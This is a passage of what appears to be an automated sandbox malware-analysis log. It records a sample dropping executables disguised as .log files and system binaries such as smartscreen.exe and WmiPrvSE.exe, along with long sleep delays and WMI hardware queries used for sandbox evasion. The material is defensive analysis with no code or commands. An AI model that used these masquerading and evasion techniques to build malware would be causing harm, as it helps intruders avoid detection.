                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\mTUsIbsw.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\XOqvKXRc.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\ScMeneug.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\mESaxTkZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TJxnsSJM.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WudDzgUF.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\oGFJTCoU.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sOCSoUjP.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\FlHYcgCL.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LXFfeqSZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\BVvzTrPR.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exe TID: 2336Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exe TID: 8152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 8184Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 2056Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exe TID: 2144Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exe TID: 3468Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\WmiPrvSE.exe TID: 5544Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\WmiPrvSE.exe TID: 4348Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 2708Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -10145709240540247s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -600000s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -599890s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -599672s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -598953s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -598578s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7568Thread sleep time: -21600000s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -597485s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -597078s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -596922s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -596531s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -596328s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -595735s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -595493s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -595281s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -594594s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -594153s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -593969s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -593828s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -593485s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -593266s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -593016s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7568Thread sleep time: -300000s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -592750s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -592453s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -592078s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -591188s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -590969s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -590735s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -590344s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -590047s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -589719s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -589375s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -589110s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -588328s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -588031s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -587750s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -587516s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -587172s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -586875s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -586594s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -586355s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -586047s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -585141s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -584882s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -584687s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -584424s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -584245s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -584139s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -584026s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -583906s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -583719s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -583514s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -583367s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -583141s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -582719s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -582526s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -582384s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -582247s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -582105s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581997s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581886s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581747s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581640s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581510s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581404s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581278s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581144s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -581000s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -580891s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -580766s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -580641s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -580528s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -580417s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -580244s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -579683s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -579546s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -579434s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -579311s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -579201s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -579094s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -578984s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -578874s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7592Thread sleep time: -578766s >= -30000s
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exe TID: 7420Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\WmiPrvSE.exe TID: 8068Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exe TID: 5468Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 30000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 600000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 599890
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 599672
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 598953
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 598578
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 3600000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 597485
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 597078
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 596922
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 596531
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 596328
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 595735
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 595493
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 595281
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 594594
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 594153
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593969
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593828
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593485
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593266
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593016
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 300000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 592750
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 592453
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 592078
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 591188
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590969
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590735
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590344
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590047
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 589719
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 589375
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 589110
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 588328
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 588031
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 587750
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 587516
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 587172
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586875
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586594
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586355
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586047
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 585141
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584882
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584687
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584424
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584245
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584139
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584026
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583906
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583719
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583514
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583367
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583141
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582719
